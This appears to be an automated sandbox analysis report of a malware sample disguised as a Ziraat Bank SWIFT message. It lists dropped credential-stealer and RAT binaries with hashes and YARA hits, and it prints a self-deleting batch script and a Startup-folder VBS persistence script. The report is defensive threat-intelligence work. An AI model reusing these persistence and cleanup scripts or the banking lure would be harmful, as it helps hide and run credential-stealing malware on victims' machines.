Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server02.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	5.68506548460809
Encrypted:	false
SSDEEP:	1536:iwa4JKXrrJUtuACC11BJVeSodqcyxCVf1UMR7pgpPYl4:O4JUXJUUACCzBJVeSOqcyi+MDgpP3
MD5:	D49B97C9900DA1344E4E8481551CC14C
SHA1:	53C7014EB195741A40B1D8CA061945FDE2AA567F
SHA-256:	53406CB7D67E3D71E30AD41AFF5A31B75652624A8641E0EA05F31650ABD3FE42
SHA-512:	8EC5B8E6EE9B0B906A730BC0057A4B4F244F65837828D781D766DA3D496C8CD2AE199CC15502098DF0E61C1287D24CF2810F916D5DA91D7F0B3F458E4CABCB73
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v.............. ........@.. ....................................`.................................x...S.................................................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B........................H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	5.1497127829837765
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3DerbJSRE2J5xAIJxXZQDwU1hGD0nacwRE2J5xAInTRIOWefBQk:hWKdbuoLe0i23fJRuDNecNwi23fTvWs
MD5:	665F9D75906DD7427B17E1F41A37A730
SHA1:	C42669EB1EBFC3F476055D3245C66BD68B3E50D1
SHA-256:	E2C8F80D1199BB76072081AB795FB0F9644B8E8DE2378B7B76A87C73E3CD8027
SHA-512:	D0E94ABF496EAC0F7DFF0DC2ED30D4DDC98CD258A63D6CCA195C47E8F876F996BC7F955841577974977A5874A3260C8CE08E96304CD74C0C6EA0E413F5E31481
Malicious:	false
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user~1\AppData\Local\Temp..DEL "TrojanAI.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpA3B8.tmp.cmd" /f /q..

C:\Users\user\AppData\Local\bothsided\spadixes.exe

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2847232
Entropy (8bit):	7.748719367071522
Encrypted:	false
SSDEEP:	49152:Pfg5tQ7a/K+TKq8mFmM1I3Dxei0IqfDX40EaY8A55Dmg27RnWGj:Hg56lWF31I3D4i0vfDX40EFD527BWG
MD5:	DCC2879AA564D607525D1AB00FBF6D6D
SHA1:	39E7F778871B0F835387FE75C2B4DB2F213FF6B9
SHA-256:	DC1E696877DEBE64BB8D38CBD79D1B64664C9571B074065E4DC04159ADDA5A01
SHA-512:	B7C7BE904E87852A0952DF73B75392BA8A88DF6B642AEF29155A24925D53400599B45751B794FB0388E44C72A9DEFE64A8ACC8B53DFDF29F0243109A9275A12C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....}Hg..........".................t_............@...........................+.....O.+.......@.......@......................p..\|....@..............................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc.......P".......!.............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\85573514e2c8fb2a.bin

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.9804061530542345
Encrypted:	false
SSDEEP:	384:SYn1rxnPhpa0RcIAJ34FRyBSIJMLag37qHAQ+e:SYn1BeccIAJW+AWg37qn
MD5:	3241085ACA5F8BC4647820A85E11A543
SHA1:	18FBF757A363CABC0D8F157403F2EB5E6A12CF5C
SHA-256:	DE2A4211F7348D6807072F629E3ECFEF55854E54BA0A57933C7322759BB185A3
SHA-512:	8789C4514996B3454EAD89A78EF8B74E075502D18C6549045C9D712CBB6424367F35C492478D65E877B27FE286F5F8FF07122A661B63DD55536D419B30ED5CFC
Malicious:	false
Preview:	...[....Oh...g...W>_+-&.}/.k..7]d.....p~=.0..vt)....2F.h..h:`..........-.`.4j..i#$q3.....4J.3R.......h...&'..@.Q]........h.. qJ....~.k`.C;.G}..XB"..!..E.J........!3.{{....\.R.u.gl.q..-..C.`1n.y..#TgcD...ex.+..j.(.s+...DT.[....z...M.....6....$...d.......1t.E<..=.D^../e@+.p?...Y.&.....J..d.,X..a..3DV.J...[.....Q.....Yb}R..z.P....T..i7Z6..-..Q.@].....T.4.9M??.....8...L...W.t..NN..~.():.0O.T\|/..l`N,.IK.}......&.~_ZA.N)..i.%<`c.%...U..(.N...D...^.s.QY]?..c..G1..E..!..Zee..HZ.....}%.,."....WF..s.r'.4...!d62Q.U.....U1.,...zT.[ ..9.Hq0Vil...\|\|$>..,.S...M....p*l..&1.k..2......:.....Z .j.{../..G.4.g..k9.......T .;..0.f..+..R.;l..U..y9:..M"................f......8.t.(...>..!....a.Pd...x.b..=.E.`.3...<...G.:..e?i.i.;o..zVE..s..L=..!.}...g_.(u)O....Y...}.G+..:c\...X3.~.vE..?L.g.].u....../b.........U..lBD.....bd.Fy.....w.l......!...?.6...f`F...eM.?T.:..q..H.gL.0sS.^\|....?.F......X...c5&...SZp}t.?......O....5/w....`...>......a.....&..e....p(9

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Nov 28 16:26:52 2024, mtime=Thu Nov 28 16:26:52 2024, atime=Thu Nov 28 16:26:49 2024, length=231936, window=
Category:	dropped
Size (bytes):	1797
Entropy (8bit):	3.6237095839363285
Encrypted:	false
SSDEEP:	24:8pTfYSHddgGUB21h9bdfvTUNAxs4FSnjug9ZnhLugoqxpJ9pJtm:8VYSHngGc21hv4GK4+juUZtu+JLJt
MD5:	38EAB15B52A69D63BAA3853DFAA6AFB0
SHA1:	135D50B2040FEF39083E6582AAA68F041E950295
SHA-256:	839D28CBBDB161B8EAE4BE0FD405A85B8D80AA02B79429382CC9DAE135E69DE2
SHA-512:	1845DFBBF843129DD89A6DFFFCD7CEC9EF9DC7D02A4D5E11A7E9ED4DC2A50082611006B3EC361FEA5226FB70B83DF5D7A15976EE08FD77D8D4BAE10DF2467CD6
Malicious:	false
Preview:	L..................F.@.. .......A......A..+....A............................:..DG..Yr?.D..U..k0.&...&......Qg._.......A..p...A......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=\|YV...........................3N.A.p.p.D.a.t.a...B.V.1.....\|YY...Roaming.@......EW.=\|YY............................#..R.o.a.m.i.n.g.....T.1.....\|Y[...ACCApi..>......\|Y[.\|Y[...........................i.-.A.C.C.A.p.i.....l.2.....\|YY. .TROJAN~1.EXE..P......\|Y[.\|Y[............................c^.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......h...............-.......g............5W......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.o.j.a.n.A.I...e.x.e.........%SystemDrive%\Users\user~1\AppData\Local\Temp\TrojanAI.exe............................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

Download File

Process:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
File Type:	data
Category:	modified
Size (bytes):	284
Entropy (8bit):	3.425186556485187
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1kyCpFA36nriIM8lfQVn:DsO+vNlMkXg1Q11Cc4mA2n
MD5:	C1807C11D4209B337D8FC181B49ECF3E
SHA1:	7971A0EBBE8AA28EB282F679B32F9A48294B0A45
SHA-256:	0114F70A3AB8DF03718307A70DE0C7942A9B0E4996F0DE3788E9837E0110B4C8
SHA-512:	3FBF941528753F59D20C0C9C081DE3C6F564D41D0AF825192865102A890B01BD24C064B41A3D816474BB5C7B8EAE550A4B205003C020F79C712AB03368F0CAC7
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.b.o.t.h.s.i.d.e.d.\.s.p.a.d.i.x.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2847232
Entropy (8bit):	7.748721333789716
Encrypted:	false
SSDEEP:	49152:Dfg5tQ7a/K+TKq8mFmM1I3Dxei0IqfDX40EaY8A55Dmg27RnWGj:7g56lWF31I3D4i0vfDX40EFD527BWG
MD5:	87CA27A96A522D237B95FD9FD5529FFD
SHA1:	6FA6FD7DD93DA1C4D88600FE4867D6CDAE7C4750
SHA-256:	CE1DC42D7BB4C43148A861773C3ED0498BD692FD64DD5611F8B10EF0FE738824
SHA-512:	1EB1BE3D8FA02AD65669ECE7780CA0205F3EC802CE15375258AE3DB0ED32C9C82E09CD8C2CE09A2CCE35C003FDF29E68644B662E8E8FECDF5AC02B7C1D1599EB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....}Hg..........".................t_............@...........................+.....7.+.......@.......@......................p..\|....@..............................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc.......P".......!.............@...................................................................................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1225728
Entropy (8bit):	5.163305429672164
Encrypted:	false
SSDEEP:	12288:TEP3R6bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Y6bsqjnhMgeiCl7G0nehbGZpbD
MD5:	4CD8E17DC31C8341472C14897C7F0A30
SHA1:	23B50A801DB8362EFC3C43BD6ADCBF2E2F0DCE0E
SHA-256:	A8DDFB075762F1FD15303AB6CFAE91C7FC9C988BC56C177B7B17D0F8B284A56F
SHA-512:	B63C01DD20EC6609B93C084E513E54B109D0297A40027C9BD971C9EB3F58BEE9650FAA2DC0A0729FC2C786DCF6EB3F5785123FA2AA81C2D3560AA558DE22C7D5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................n..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.671031429183209
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File size:	2'267'136 bytes
MD5:	fa7dcecb3c5ac81610c93c6b91cda38a
SHA1:	7359e8d92749a87655654a04671239dc7f300af9
SHA256:	3ca1c11c2d4173581e8007b955c912dd1d6abdb1bafe03924aca8cba437df745
SHA512:	da4d80a539618067918fbd81ebcb14ededcb8b90eb07aabfcab018702336ffeb8d6677f21e56ea7ae3671a0ace57b7c660efc50a659227ef7ad0f268d61d5bc9
SSDEEP:	49152:5Vg5tQ7a/K+TKq8mFmM1I3Dxei0IqfDX40EaY8A5:Hg56lWF31I3D4i0vfDX40E
TLSH:	ACA5012363DDC261C3B25173BA65B741AEBF782506A5F96B2FD8093DFD20122520E673
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67487DC5 [Thu Nov 28 14:27:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007FF05CB40FEFh
jmp 00007FF05CB34004h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FF05CB3418Ah
cmp edi, eax
jc 00007FF05CB344EEh
bt dword ptr [004C0158h], 01h
jnc 00007FF05CB34189h
rep movsb
jmp 00007FF05CB3449Ch
cmp ecx, 00000080h
jc 00007FF05CB34354h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FF05CB34190h
bt dword ptr [004BA370h], 01h
jc 00007FF05CB34660h
bt dword ptr [004C0158h], 00000000h
jnc 00007FF05CB3432Dh
test edi, 00000003h
jne 00007FF05CB3433Eh
test esi, 00000003h
jne 00007FF05CB3431Dh
bt edi, 02h
jnc 00007FF05CB3418Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FF05CB34193h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FF05CB341E5h
bt esi, 03h
jnc 00007FF05CB34238h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x160784	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x225000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x160784	0x160800	6618456ad3f5dc9d0fa811f4d7fc9805	False	0.9816724844858156	data	7.987624072827237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x225000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x157a89	data			1.0003108978271484
RT_GROUP_ICON	0x224244	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x2242bc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x2242d0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x2242e4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x2242f8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x2243d4	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
